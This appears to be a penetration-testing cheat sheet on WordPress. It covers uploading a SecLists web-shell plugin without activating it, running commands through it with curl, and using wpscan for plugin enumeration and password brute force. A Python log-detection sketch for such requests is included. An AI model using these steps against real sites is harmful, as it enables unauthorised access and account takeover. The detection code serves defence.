# WordPress

* <https://www.hackingarticles.in/wordpress-reverse-shell/>

## Custom Plugin

Write a web shell with a custom plugin.

Copy a plugin shell from SecLists and zip it:

```
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ zip plugin-shell.zip plugin-shell.php
```

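Upload `plugin-shell.zip` (Plugins > Add New) and install it (Upload Plugin > Browse... > Install Now), **but do not activate it**. Installing alone unpacks the archive under `wp-content/plugins/plugin-shell/`, so the PHP file is served directly by the web server even while the plugin is inactive. Now you can access the web shell: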

```
$ curl 'http://10.10.13.37/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami'
```
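Seen from the defender's side, the request above leaves a recognisable access-log entry: a plugin PHP file requested directly with a command-style query parameter. The following detection sketch is an added example, not part of the original page; the log lines are constructed, and the parameter-name list and combined log format are assumptions to tune per site.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A PHP file requested directly inside a plugin directory (WordPress may live in a subdirectory).
PLUGIN_PHP_RE = re.compile(
    r'^/(?:[^/]+/)*wp-content/plugins/(?P<plugin>[^/]+)/(?:[^/]+/)*[^/]+\.php$', re.I
)
# Assumption: parameter names typical of simple web shells; extend for your environment.
SUSPECT_PARAMS = {"cmd", "exec", "command", "c"}


def find_plugin_shell_hits(lines):
    """Return (ip, plugin, path, params, status) for direct plugin PHP
    requests that carry a suspicious query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log-format line
        url = urlsplit(m.group("target"))
        pm = PLUGIN_PHP_RE.match(url.path)
        if not pm:
            continue  # static assets, admin-ajax.php, etc.
        names = set(parse_qs(url.query, keep_blank_values=True))
        params = sorted(names & SUSPECT_PARAMS)
        if params:
            hits.append((m.group("ip"), pm.group("plugin"), url.path,
                         params, int(m.group("status"))))
    return hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami HTTP/1.1" 200 12 "-" "curl/8.0"',
    '10.10.14.3 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/akismet/_inc/akismet.css?ver=5.3 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [01/Jan/2024:10:01:00 +0000] "GET /wp/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=id HTTP/1.1" 404 0 "-" "curl/8.0"',
    'garbage line',
]

if __name__ == "__main__":
    for hit in find_plugin_shell_hits(SAMPLE_LOG):
        print(hit)
```

A hit on a plugin directory that is not in the site's active plugin list is the stronger signal, since legitimate traffic rarely requests PHP files of inactive plugins.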

## wpscan

* <https://github.com/wpscanteam/wpscan>
* <https://wpscan.com/profile>

```
$ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force -e ap [--plugins-detection aggressive] --disable-tls-checks -o wpscan.out
$ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt --disable-tls-checks
```
